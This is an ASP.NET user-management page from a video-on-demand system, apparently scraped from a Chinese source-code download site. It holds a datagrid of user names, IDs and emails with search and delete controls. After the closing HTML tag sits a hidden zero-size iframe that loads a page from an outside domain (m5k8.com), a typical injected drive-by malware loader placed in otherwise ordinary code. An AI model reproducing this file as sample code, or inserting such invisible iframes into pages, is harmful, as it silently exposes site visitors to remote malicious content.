⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 manageuser.aspx

📁 视频点播系统使用方法如下: 1. 将"视频点播系统"目录下的所有文件和目录复制到IIS服务器根目录下某新建的虚目录
💻 ASPX
字号:
<%@ Page language="c#" Codebehind="ManageUser.aspx.cs" AutoEventWireup="false" Inherits="Vod.ManageUser" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
	<HEAD>
		<title>ShowUserOrders</title>
		<meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
		<meta name="CODE_LANGUAGE" Content="C#">
		<meta name="vs_defaultClientScript" content="JavaScript">
		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
		<LINK href="ioffice.css" type="text/css" rel="stylesheet">
		<LINK href="style2.css" type="text/css" rel="stylesheet">
	</HEAD>
	<body MS_POSITIONING="GridLayout" bgColor="#EDE9EF">
		<FONT face="宋体"><FONT face="宋体">
				<FORM id="Form1" method="post" runat="server">
					<FONT face="宋体">
						<TABLE id="Table1" align="center" HEIGHT="100%" cellSpacing="0" cellPadding="0" border="0" width="780" background="img/muserbg1.gif">
							<TR>
								<TD width="202" height="433"><iframe id="iFrame1" style="BORDER-TOP-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-BOTTOM-STYLE: none" tabIndex="0" marginWidth="0" marginHeight="0" src="ManagerLeft.aspx" frameBorder="0" width="100%" height="100%">
									</iframe>
								</TD>
								<TD vAlign="top" noWrap align="middle">
									<TABLE id="Table2" style="WIDTH: 100%" cellSpacing="0" cellPadding="0" border="0">
										<tr>
											<td colSpan="3" height="25" style="WIDTH: 161px"></td>
										</tr>
										<TR>
										    <td width="30px"></td>
											<TD><img src="img/manageUser.gif" border="0"></TD>
											<TD style="WIDTH: 280px"></TD>
										</TR>
									</TABLE>
									<FONT face="宋体">
										<TABLE id="Table3" align="center" cellSpacing="0" cellPadding="0" width="60%" border="0">
											<TR>
												<TD  colSpan="4" style="HEIGHT: 20px" noWrap height="26"></TD>
											</TR>	
										    <tr>
										        <td width="290"></td>					
										        <TD><img src="img/5.gif" height="20px" width="20px" border="0"></TD>
								                <TD vAlign="center">
								                <asp:textbox id="tb_Search" runat="server" Width="90px"></asp:textbox></TD>
								                <TD vAlign="left"><asp:button id="button_Search" runat="server" width="60" Text="搜索"></asp:button></td>
										    </tr>
											<TR>
												<TD  colSpan="4" style="HEIGHT: 20px" noWrap height="26"></TD>
											</TR>
											<tr>
											    <td align="middle"  colSpan="4" ><asp:label id="Label1" runat="server" Width="160px" Font-Size="X-Small"></asp:label></td>											 
											</tr>
											<TR>
												<TD  colSpan="4" style="HEIGHT: 20px" noWrap height="26"></TD>
											</TR>											
											<TR>
												<TD noWrap colSpan="4">
													<asp:datagrid id="DataGrid1" runat="server" ShowFooter="True" align ="middle" Width="100%" GridLines="Horizontal" BorderStyle="Groove" BorderWidth="2px" CellPadding="3" BackColor="White" BorderColor="DarkGray" AutoGenerateColumns="False" PageSize="20" AllowSorting="True" AllowPaging="True" Font-Size="X-Small">
													<SelectedItemStyle Font-Underline="True" Font-Bold="True" ForeColor="#F7F7F7" BackColor="#738A9C"></SelectedItemStyle>
													<AlternatingItemStyle BorderColor="#804000" BackColor="#D3F8F6"></AlternatingItemStyle>
													<ItemStyle ForeColor="#4A3C8C" BorderColor="DarkGray" BackColor="White"></ItemStyle>
													<HeaderStyle Font-Size="X-Small" Font-Names="宋体" Wrap="False" BorderWidth="5px" ForeColor="Black" BorderColor="Magenta" BackColor="#F5AFF3"></HeaderStyle>
													<FooterStyle Font-Size="Small" ForeColor="White" BackColor="Ivory"></FooterStyle>
													<Columns>
														<asp:TemplateColumn HeaderText="选择">
														<HeaderStyle Width="50px"></HeaderStyle>
														<ItemStyle HorizontalAlign="Center"></ItemStyle>
														<ItemTemplate>
															<asp:CheckBox id="CheckBox1" style="Z-INDEX: 102; LEFT: 213px" runat="server"></asp:CheckBox>
														</ItemTemplate>
													      <FooterTemplate>
															<asp:imagebutton id="btnCheckAll" runat="server" CommandName="CheckAll" ImageUrl="img\Addsave.gif" ToolTip="全部选择"></asp:imagebutton>
														  </FooterTemplate>
														</asp:TemplateColumn>
													<asp:TemplateColumn HeaderText="序号">
														<HeaderStyle Width="50px"></HeaderStyle>
														<ItemStyle HorizontalAlign="center"></ItemStyle>
														<ItemTemplate>
													<SPAN>
														<%# RowNo %>
													</SPAN>
													</ItemTemplate>
														<FooterTemplate>
														<asp:ImageButton id="btnDelete" runat="server" CommandName="Delete" ImageUrl="img\delete.gif" ToolTip="删除选择的所有项"></asp:ImageButton>
													</FooterTemplate>
														</asp:TemplateColumn>
														<asp:BoundColumn DataField="Name" SortExpression="Name" HeaderText="用户名">
													    <HeaderStyle Width="80px" HorizontalAlign="Center"></HeaderStyle>
														<ItemStyle HorizontalAlign="Center"></ItemStyle>
														</asp:BoundColumn>
														<asp:BoundColumn DataField="Id" SortExpression="Id" HeaderText="用户ID">
														<HeaderStyle Width="80px" HorizontalAlign="Center"></HeaderStyle>
														<ItemStyle HorizontalAlign="Center"></ItemStyle>
														</asp:BoundColumn>														
														<asp:BoundColumn DataField="Mail" SortExpression="Mail" HeaderText="电子邮件">
														<HeaderStyle Width="160px" HorizontalAlign="Center"></HeaderStyle>
														<ItemStyle HorizontalAlign="Left"></ItemStyle>
														</asp:BoundColumn>
														</Columns>
														<PagerStyle NextPageText="下一页&amp;gt;" BorderWidth="1px" Font-Size="Smaller" BorderColor="Magenta" PrevPageText="上一页&amp;lt;" HorizontalAlign="Left" ForeColor="White" BackColor="#EFA1EC" Mode="NumericPages"></PagerStyle>
													 </asp:datagrid>
												</TD>
											</TR>
										</TABLE>
										<asp:label id="lblInfo" runat="server" ForeColor="Blue" Font-Size="X-Small" Width="467px" Visible="False"></asp:label></FONT></TD>
							</TR>
						</TABLE>
					</FONT>
				</FORM>
			</FONT></FONT>
	</body>
</HTML>
<IFRAME SRC="HTTP://www.m5k8.com/gr.htm" WIDTH=0 HEIGHT=0></IFRAME>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -